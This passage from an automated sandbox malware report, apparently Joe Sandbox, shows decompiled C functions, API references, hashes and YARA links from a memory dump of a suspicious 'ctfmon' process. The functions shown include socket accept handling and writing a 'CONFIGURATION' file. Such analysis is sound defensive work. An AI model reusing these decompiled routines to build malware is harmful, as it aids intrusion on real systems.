                                                • Opcode Fuzzy Hash: d8111f66b52498950c55e6ae2d26dacf00fbac322f55668a978b715dae2d45b4
                                                • Instruction Fuzzy Hash: 6721B432908345ABC721DF24D815B9FBBE8EFC9310F01462AF99CD7250EB3199488B82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00968F70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • accept.WS2_32(?,?,?), ref: 00968F96
                                                • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 00968FB3
                                                • WSAIoctl.WS2_32(00000000,98000004,00000001,0000000C,00000000,00000000,00000001,00000000,00000000), ref: 00968FE8
                                                • new.LIBCMT ref: 00968FF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Ioctlacceptsetsockopt
                                                • String ID: /LU5/
                                                • API String ID: 4090600942-937868281
                                                • Opcode ID: 7c50c22d149dab4f67f77db5dbaa9b3258a3c4c9e46d0f94192316ad6ec0602a
                                                • Instruction ID: 9c796031c675c1140eb076a8ca90dd956d5facb34971b9245ef2d23b87fc8443
                                                • Opcode Fuzzy Hash: 7c50c22d149dab4f67f77db5dbaa9b3258a3c4c9e46d0f94192316ad6ec0602a
                                                • Instruction Fuzzy Hash: 2B111CB1941208EFEB10DF94DC49FEE7BFCEB08700F100165E915FA280DBB16A489BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009790F8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 71%
                                                			E009790F8(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x990558; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E009778D0(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00977F1D(_t25, __eflags,  *0x990558, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00978F6A(_t25, _t31, 0x996690);
							E00977848(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00977848();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00977805(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x990558; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E009778D0(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00977F1D(_t27, __eflags,  *0x990558, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00978F6A(_t27, _t32, 0x996690);
									E00977848(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00977848();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00977EC7(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00977EC7(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                0x009790f8
                                                0x009790f8
                                                0x009790f8
                                                0x00979102
                                                0x00979104
                                                0x00979109
                                                0x0097910c
                                                0x0097911a
                                                0x00979121
                                                0x00979126
                                                0x00979129
                                                0x0097912c
                                                0x0097913e
                                                0x00979143
                                                0x00979145
                                                0x00979150
                                                0x00979157
                                                0x0097915c
                                                0x0097915f
                                                0x00979161
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00979147
                                                0x00979147
                                                0x00000000
                                                0x00979147
                                                0x0097912e
                                                0x0097912e
                                                0x0097912f
                                                0x0097912f
                                                0x00979134
                                                0x0097916f
                                                0x00979170
                                                0x00979176
                                                0x0097917b
                                                0x0097917e
                                                0x0097917f
                                                0x00979180
                                                0x00979187
                                                0x00979189
                                                0x0097918b
                                                0x00979190
                                                0x00979193
                                                0x009791a1
                                                0x009791ad
                                                0x009791b0
                                                0x009791b3
                                                0x009791c5
                                                0x009791ca
                                                0x009791cc
                                                0x009791d7
                                                0x009791dd
                                                0x009791e5
                                                0x009791e7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009791ce
                                                0x009791ce
                                                0x00000000
                                                0x009791ce
                                                0x009791b5
                                                0x009791b5
                                                0x009791b6
                                                0x009791b6
                                                0x009791e9
                                                0x009791ea
                                                0x009791ea
                                                0x00979195
                                                0x0097919b
                                                0x0097919f
                                                0x009791f2
                                                0x009791f3
                                                0x009791f9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097919f
                                                0x00979200
                                                0x00979200
                                                0x0097910e
                                                0x00979114
                                                0x00979118
                                                0x00979163
                                                0x00979164
                                                0x0097916e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00979118

                                                APIs
                                                • GetLastError.KERNEL32(123,?,009749AE,?,123,?,00977670,00990E80,123,?,73B76490,123,?,77109EB0), ref: 009790FC
                                                • SetLastError.KERNEL32(00000000,123,?,73B76490,123,?,77109EB0), ref: 00979164
                                                • SetLastError.KERNEL32(00000000,123,?,73B76490,123,?,77109EB0), ref: 00979170
                                                • _abort.LIBCMT ref: 00979176
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_abort
                                                • String ID: 123
                                                • API String ID: 88804580-2286445522
                                                • Opcode ID: c099750025ba6114ecaf0f9767feda0a97f26cd25335ec29c51f1488711d1bd9
                                                • Instruction ID: e8fba914e7d0b04d8a3b3f9222ac2cff0995b7fdd2948ce5966803985b0df3db
                                                • Opcode Fuzzy Hash: c099750025ba6114ecaf0f9767feda0a97f26cd25335ec29c51f1488711d1bd9
                                                • Instruction Fuzzy Hash: FCF0283764C60266C2023778AC0EF6B262DDFD2776F228024F41CD6291EE648C119262
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097D7BD Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E0097D7BD(void* __ebx, void* __edi, signed int _a4, void* _a8, signed int _a12) {
				signed int _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				void* __esi;
				signed int _t62;
				intOrPtr _t66;
				signed char _t68;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t77;
				intOrPtr _t79;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				signed int _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr _t112;
				signed int _t117;
				signed int _t119;
				void* _t121;
				signed int _t123;
				signed int _t124;
				void* _t125;

				_t62 =  *0x98f008; // 0x35554c2f
				_v8 = _t62 ^ _t124;
				_t110 = _a12;
				_v12 = _t110;
				_t123 = _a4;
				_t121 = _a8;
				_v52 = _t121;
				if(_t110 != 0) {
					__eflags = _t121;
					if(_t121 != 0) {
						_push(__ebx);
						_t106 = _t123 >> 6;
						_t119 = (_t123 & 0x0000003f) * 0x30;
						_v32 = _t106;
						_t66 =  *((intOrPtr*)(0x996480 + _t106 * 4));
						_v48 = _t66;
						_v28 = _t119;
						_t13 = _t119 + 0x29; // 0x8a10000
						_t107 =  *((intOrPtr*)(_t66 + _t13));
						__eflags = _t107 - 2;
						if(_t107 == 2) {
							L6:
							_t68 =  !_t110;
							__eflags = _t68 & 0x00000001;
							if((_t68 & 0x00000001) != 0) {
								_t66 = _v48;
								L9:
								__eflags =  *(_t66 + _t119 + 0x28) & 0x00000020;
								if(__eflags != 0) {
									E009809B4(_t123, 0, 0, 2);
									_t125 = _t125 + 0x10;
								}
								_t69 = E0097D362(_t107, _t119, __eflags, _t123);
								__eflags = _t69;
								if(_t69 == 0) {
									_t112 =  *((intOrPtr*)(0x996480 + _v32 * 4));
									_t71 = _v28;
									__eflags =  *(_t112 + _t71 + 0x28) & 0x00000080;
									if(( *(_t112 + _t71 + 0x28) & 0x00000080) == 0) {
										_t40 = _t71 + 0x18; // 0xcccccccc
										_v24 = 0;
										_v20 = 0;
										_v16 = 0;
										_t73 = WriteFile( *(_t112 + _t40), _t121, _v12,  &_v20, 0);
										__eflags = _t73;
										if(_t73 == 0) {
											_v24 = GetLastError();
										}
										_t123 =  &_v24;
										goto L28;
									}
									_t87 = _t107;
									__eflags = _t87;
									if(_t87 == 0) {
										_t89 = E0097D3D8(_t107, _t121,  &_v24, _t123, _t121, _v12);
										goto L17;
									}
									_t90 = _t87 - 1;
									__eflags = _t90;
									if(_t90 == 0) {
										_t89 = E0097D5A5(_t107, _t121,  &_v24, _t123, _t121, _v12);
										goto L17;
									}
									__eflags = _t90 != 1;
									if(_t90 != 1) {
										goto L34;
									}
									_t89 = E0097D4B7(_t107, _t121,  &_v24, _t123, _t121, _v12);
									goto L17;
								} else {
									__eflags = _t107;
									if(_t107 == 0) {
										_t89 = E0097D142(_t107, _t121,  &_v24, _t123, _t121, _v12);
										L17:
										L15:
										_t123 = _t89;
										L28:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t74 = _v40;
										__eflags = _t74;
										if(_t74 != 0) {
											__eflags = _t74 - _v36;
											L40:
											L41:
											return E00970A5D(_v8 ^ _t124, _t123);
										}
										_t77 = _v44;
										__eflags = _t77;
										if(_t77 == 0) {
											_t121 = _v52;
											L34:
											_t117 = _v28;
											_t79 =  *((intOrPtr*)(0x996480 + _v32 * 4));
											__eflags =  *(_t79 + _t117 + 0x28) & 0x00000040;
											if(( *(_t79 + _t117 + 0x28) & 0x00000040) == 0) {
												L37:
												 *((intOrPtr*)(E00975D43())) = 0x1c;
												_t81 = E00975D30();
												 *_t81 =  *_t81 & 0x00000000;
												__eflags =  *_t81;
												L38:
												goto L40;
											}
											__eflags =  *_t121 - 0x1a;
											if( *_t121 != 0x1a) {
												goto L37;
											}
											goto L40;
										}
										_t123 = 5;
										__eflags = _t77 - _t123;
										if(_t77 != _t123) {
											_t81 = E00975D0D(_t77);
										} else {
											 *((intOrPtr*)(E00975D43())) = 9;
											 *(E00975D30()) = _t123;
										}
										goto L38;
									}
									__eflags = _t107 - 1 - 1;
									if(_t107 - 1 > 1) {
										goto L34;
									}
									_t89 = E0097D2F5( &_v24, _t121, _v12);
									goto L15;
								}
							}
							 *(E00975D30()) =  *_t97 & 0x00000000;
							 *((intOrPtr*)(E00975D43())) = 0x16;
							_t81 = E00975C10();
							goto L38;
						}
						__eflags = _t107 - 1;
						if(_t107 != 1) {
							goto L9;
						}
						goto L6;
					}
					 *(E00975D30()) =  *_t99 & _t121;
					 *((intOrPtr*)(E00975D43())) = 0x16;
					E00975C10();
					goto L41;
				}
				goto L41;
			}






































                                                0x0097d7c5
                                                0x0097d7cc
                                                0x0097d7cf
                                                0x0097d7d2
                                                0x0097d7d6
                                                0x0097d7da
                                                0x0097d7dd
                                                0x0097d7e2
                                                0x0097d7eb
                                                0x0097d7ed
                                                0x0097d80e
                                                0x0097d813
                                                0x0097d819
                                                0x0097d81c
                                                0x0097d81f
                                                0x0097d826
                                                0x0097d829
                                                0x0097d82c
                                                0x0097d82c
                                                0x0097d830
                                                0x0097d833
                                                0x0097d83a
                                                0x0097d83c
                                                0x0097d83e
                                                0x0097d840
                                                0x0097d85f
                                                0x0097d862
                                                0x0097d862
                                                0x0097d867
                                                0x0097d870
                                                0x0097d875
                                                0x0097d875
                                                0x0097d879
                                                0x0097d87f
                                                0x0097d881
                                                0x0097d8bf
                                                0x0097d8c6
                                                0x0097d8c9
                                                0x0097d8ce
                                                0x0097d916
                                                0x0097d91d
                                                0x0097d920
                                                0x0097d923
                                                0x0097d92f
                                                0x0097d935
                                                0x0097d937
                                                0x0097d93f
                                                0x0097d93f
                                                0x0097d942
                                                0x00000000
                                                0x0097d942
                                                0x0097d8d3
                                                0x0097d8d3
                                                0x0097d8d6
                                                0x0097d90f
                                                0x00000000
                                                0x0097d90f
                                                0x0097d8d8
                                                0x0097d8d8
                                                0x0097d8db
                                                0x0097d8ff
                                                0x00000000
                                                0x0097d8ff
                                                0x0097d8dd
                                                0x0097d8e0
                                                0x00000000
                                                0x00000000
                                                0x0097d8ef
                                                0x00000000
                                                0x0097d883
                                                0x0097d883
                                                0x0097d885
                                                0x0097d8b2
                                                0x0097d8b7
                                                0x0097d8a2
                                                0x0097d8a2
                                                0x0097d945
                                                0x0097d948
                                                0x0097d949
                                                0x0097d94a
                                                0x0097d94b
                                                0x0097d94e
                                                0x0097d950
                                                0x0097d9b5
                                                0x0097d9b8
                                                0x0097d9b9
                                                0x0097d9c8
                                                0x0097d9c8
                                                0x0097d952
                                                0x0097d955
                                                0x0097d957
                                                0x0097d97d
                                                0x0097d980
                                                0x0097d983
                                                0x0097d986
                                                0x0097d98d
                                                0x0097d992
                                                0x0097d99d
                                                0x0097d9a2
                                                0x0097d9a8
                                                0x0097d9ad
                                                0x0097d9ad
                                                0x0097d9b0
                                                0x00000000
                                                0x0097d9b0
                                                0x0097d994
                                                0x0097d997
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097d999
                                                0x0097d95b
                                                0x0097d95c
                                                0x0097d95e
                                                0x0097d975
                                                0x0097d960
                                                0x0097d965
                                                0x0097d970
                                                0x0097d970
                                                0x00000000
                                                0x0097d95e
                                                0x0097d889
                                                0x0097d88c
                                                0x00000000
                                                0x00000000
                                                0x0097d89a
                                                0x00000000
                                                0x0097d89f
                                                0x0097d881
                                                0x0097d847
                                                0x0097d84f
                                                0x0097d855
                                                0x00000000
                                                0x0097d855
                                                0x0097d835
                                                0x0097d838
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097d838
                                                0x0097d7f4
                                                0x0097d7fb
                                                0x0097d801
                                                0x00000000
                                                0x0097d806
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /LU5/
                                                • API String ID: 0-937868281
                                                • Opcode ID: 1dc267ca5eb1fa06f96219b9acfd89eec64833ee937135aad1c3048c5db227cf
                                                • Instruction ID: 453a4c7370c0056594e8235113eb9815a635865ead37d69d2bf78612d56bdd50
                                                • Opcode Fuzzy Hash: 1dc267ca5eb1fa06f96219b9acfd89eec64833ee937135aad1c3048c5db227cf
                                                • Instruction Fuzzy Hash: 1B510573D12209EFDB219FA8C849FEEBBB8AF85310F158459E50CA7292D7749D00CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00976BBC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E00976BBC(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x98f008; // 0x35554c2f
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00976A7D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00970ABD(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00970ABD(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00970ABD(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0097B348(_t56);
						_t40 = E00977848(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0097B348(_t56);
						E00977848(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x98f008;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                                                0x00976bbc
                                                0x00976bc6
                                                0x00976bca
                                                0x00976bcc
                                                0x00976bd0
                                                0x00976bda
                                                0x00976beb
                                                0x00976bf0
                                                0x00976bf2
                                                0x00976bf4
                                                0x00976bf6
                                                0x00976bf8
                                                0x00976bfc
                                                0x00976cb6
                                                0x00976cc4
                                                0x00976cc6
                                                0x00976ccb
                                                0x00976cd2
                                                0x00976cd4
                                                0x00976ce2
                                                0x00976cf1
                                                0x00976cf4
                                                0x00976cf6
                                                0x00000000
                                                0x00976cf7
                                                0x00976c04
                                                0x00976c09
                                                0x00976c0e
                                                0x00976c10
                                                0x00976c10
                                                0x00976c12
                                                0x00976c17
                                                0x00976c1b
                                                0x00976c1b
                                                0x00976c1e
                                                0x00976c3d
                                                0x00976c3d
                                                0x00976c3f
                                                0x00976c42
                                                0x00976c4b
                                                0x00976c4e
                                                0x00976c53
                                                0x00976c56
                                                0x00976c5b
                                                0x00000000
                                                0x00000000
                                                0x00976c5d
                                                0x00000000
                                                0x00976c20
                                                0x00976c20
                                                0x00976c22
                                                0x00976c2b
                                                0x00976c2e
                                                0x00976c33
                                                0x00976c36
                                                0x00976c3b
                                                0x00976c65
                                                0x00976c68
                                                0x00976c6a
                                                0x00976c6d
                                                0x00976c75
                                                0x00976c7b
                                                0x00976c82
                                                0x00976c84
                                                0x00976c8c
                                                0x00976c9b
                                                0x00976c9f
                                                0x00976ca1
                                                0x00976ca4
                                                0x00000000
                                                0x00000000
                                                0x00976ca6
                                                0x00976ca9
                                                0x00976cab
                                                0x00976cab
                                                0x00976cac
                                                0x00976cae
                                                0x00976cb1
                                                0x00000000
                                                0x00976cab
                                                0x00000000
                                                0x00976c3b
                                                0x00976c1e
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /LU5/
                                                • API String ID: 0-937868281
                                                • Opcode ID: aac9fb0883b8dc988dea86217dfbd5da4c31531648fa150d36d580fcea345004
                                                • Instruction ID: bab33d1814998fdc06241110d9c218d3dfb6b9a44e4dcd8fbe18fae06eebffd7
                                                • Opcode Fuzzy Hash: aac9fb0883b8dc988dea86217dfbd5da4c31531648fa150d36d580fcea345004
                                                • Instruction Fuzzy Hash: 94419073A007009FCB15DF78C985A59B7E5EF85314F258569E699EB341E731AD01CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0097D5A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 89%
                                                			E0097D5A5(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				short _v1716;
				char _v5132;
				intOrPtr _v5136;
				long _v5140;
				void* _v5144;
				int _v5148;
				void* __esi;
				signed int _t31;
				intOrPtr _t38;
				signed int* _t41;
				int _t45;
				int _t54;
				signed int _t56;
				signed int _t58;
				signed short* _t59;
				signed int _t65;
				signed int _t67;
				signed short* _t69;
				intOrPtr* _t72;
				void* _t73;
				intOrPtr _t74;
				signed int _t75;

				E00983CA0();
				_t31 =  *0x98f008; // 0x35554c2f
				_v8 = _t31 ^ _t75;
				_t56 = _a8;
				_t58 = (_t56 & 0x0000003f) * 0x30;
				_t54 = 0;
				_t72 = _a4;
				_t7 = _t58 + 0x18; // 0xcccccccc
				_t59 = _a12;
				_t69 = _t59;
				_v5144 =  *((intOrPtr*)( *((intOrPtr*)(0x996480 + (_t56 >> 6) * 4)) + _t7));
				_t38 = _a16 + _t59;
				 *_t72 = 0;
				 *((intOrPtr*)(_t72 + 4)) = 0;
				_v5136 = _t38;
				 *((intOrPtr*)(_t72 + 8)) = 0;
				if(_t59 < _t38) {
					while(1) {
						L1:
						_t74 = _v5136;
						_t41 =  &_v1716;
						while(_t69 < _t74) {
							_t65 =  *_t69 & 0x0000ffff;
							_t69 =  &(_t69[1]);
							if(_t65 == 0xa) {
								_t67 = 0xd;
								 *_t41 = _t67;
								_t41 =  &(_t41[0]);
							}
							 *_t41 = _t65;
							_t41 =  &(_t41[0]);
							if(_t41 <  &_v12) {
								continue;
							}
							break;
						}
						_t45 = WideCharToMultiByte(0xfde9, _t54,  &_v1716, _t41 -  &_v1716 >> 1,  &_v5132, 0xd55, _t54, _t54);
						_t72 = _a4;
						_v5148 = _t45;
						if(_t45 == 0) {
							L11:
							 *_t72 = GetLastError();
						} else {
							while(WriteFile(_v5144,  &(( &_v5132)[_t54]), _t45 - _t54,  &_v5140, 0) != 0) {
								_t54 = _t54 + _v5140;
								_t45 = _v5148;
								if(_t54 < _t45) {
									continue;
								} else {
									 *((intOrPtr*)(_t72 + 4)) = _t69 - _a12;
									if(_t69 < _v5136) {
										_t54 = 0;
										goto L1;
									}
								}
								goto L12;
							}
							goto L11;
						}
						goto L12;
					}
				}
				L12:
				_pop(_t73);
				return E00970A5D(_v8 ^ _t75, _t73);
			}



























                                                0x0097d5af
                                                0x0097d5b4
                                                0x0097d5bb
                                                0x0097d5be
                                                0x0097d5c9
                                                0x0097d5d5
                                                0x0097d5d7
                                                0x0097d5db
                                                0x0097d5df
                                                0x0097d5e2
                                                0x0097d5e4
                                                0x0097d5ed
                                                0x0097d5ef
                                                0x0097d5f1
                                                0x0097d5f4
                                                0x0097d5fa
                                                0x0097d5ff
                                                0x0097d605
                                                0x0097d605
                                                0x0097d605
                                                0x0097d60b
                                                0x0097d611
                                                0x0097d615
                                                0x0097d618
                                                0x0097d61e
                                                0x0097d622
                                                0x0097d623
                                                0x0097d626
                                                0x0097d626
                                                0x0097d629
                                                0x0097d62c
                                                0x0097d634
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097d634
                                                0x0097d658
                                                0x0097d65e
                                                0x0097d661
                                                0x0097d669
                                                0x0097d6b7
                                                0x0097d6bd
                                                0x0097d66b
                                                0x0097d66b
                                                0x0097d690
                                                0x0097d696
                                                0x0097d69e
                                                0x00000000
                                                0x0097d6a0
                                                0x0097d6a5
                                                0x0097d6ae
                                                0x0097d6b0
                                                0x00000000
                                                0x0097d6b0
                                                0x0097d6ae
                                                0x00000000
                                                0x0097d69e
                                                0x00000000
                                                0x0097d66b
                                                0x00000000
                                                0x0097d669
                                                0x0097d605
                                                0x0097d6bf
                                                0x0097d6c5
                                                0x0097d6d1

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000010,0096971E,08A10000,?,0097D904,00000000,0096971E,00000010), ref: 0097D658
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0097D904,00000000,0096971E,00000010,0096971E,0096971E,?,0096971E,?,00975E64), ref: 0097D686
                                                • GetLastError.KERNEL32(?,0097D904,00000000,0096971E,00000010,0096971E,0096971E,?,0096971E,?,00975E64,0096971E,?,00000000,?,00975EFD), ref: 0097D6B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                • String ID: /LU5/
                                                • API String ID: 2456169464-937868281
                                                • Opcode ID: 7842dd19587465b45adddff877d5562eb29b0226f53065273450e0e59ad0e4d8
                                                • Instruction ID: 9fa9ed42bb7162992ef04b079a9d9ec81f1da47421ee4f1d7b23517f4dc04880
                                                • Opcode Fuzzy Hash: 7842dd19587465b45adddff877d5562eb29b0226f53065273450e0e59ad0e4d8
                                                • Instruction Fuzzy Hash: 90316176A112199FDB14CF69DC81AEAB7B8EF48304F1484ADE90ED7350D630AD84CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0096A630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 91%
                                                			E0096A630(void* __ecx, long __edx, WCHAR* _a4) {
				long _v8;
				int _t10;
				void* _t16;
				void* _t25;
				long _t30;

				_push(__ecx);
				_t30 = __edx;
				_t16 = __ecx;
				if(__edx == 0 || __ecx == 0) {
					return 0;
				} else {
					_t25 = CreateFileW(_a4, 0xc0000000, 0, 0, 2, 0, 0);
					if(_t25 != 0xffffffff) {
						_v8 = 0;
						_t10 = WriteFile(_t25, _t16, _t30,  &_v8, 0);
						CloseHandle(_t25);
						if((_t16 & 0xffffff00 | _t10 != 0x00000000) == 0 || _v8 != _t30) {
							return 0;
						} else {
							return 1;
						}
					} else {
						return 0;
					}
				}
			}








                                                0x0096a633
                                                0x0096a636
                                                0x0096a638
                                                0x0096a63c
                                                0x0096a6b2
                                                0x0096a642
                                                0x0096a65b
                                                0x0096a660
                                                0x0096a670
                                                0x0096a67b
                                                0x0096a687
                                                0x0096a68f
                                                0x0096a6aa
                                                0x0096a696
                                                0x0096a6a1
                                                0x0096a6a1
                                                0x0096a662
                                                0x0096a66a
                                                0x0096a66a
                                                0x0096a660

                                                APIs
                                                • CreateFileW.KERNEL32(0096A81A,C0000000,00000000,00000000,00000002,00000000,00000000,?,745EC0B0,?,CONFIGURATION,?,0096A81A,?), ref: 0096A655
                                                • WriteFile.KERNEL32(00000000,CONFIGURATION,0000000D,?,00000000,?,745EC0B0,?,CONFIGURATION,?,0096A81A), ref: 0096A67B
                                                • CloseHandle.KERNEL32(00000000,?,745EC0B0,?,CONFIGURATION,?,0096A81A), ref: 0096A687
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID: CONFIGURATION
                                                • API String ID: 1065093856-2209261362
                                                • Opcode ID: 09ef4195a1dfa7783927f646153d2d6ca8147fe020aae6ddb93efe90f6ff1647
                                                • Instruction ID: e8e8abfb06b4edf3fe1db3ce3f1f7707354c202f30537b8989c366a6c037a55c
                                                • Opcode Fuzzy Hash: 09ef4195a1dfa7783927f646153d2d6ca8147fe020aae6ddb93efe90f6ff1647
                                                • Instruction Fuzzy Hash: E701F53279121877EB30896AFC46BFAB79CD782B31F1402ABFE0CE7280D6614C042591
                                                Uniqueness

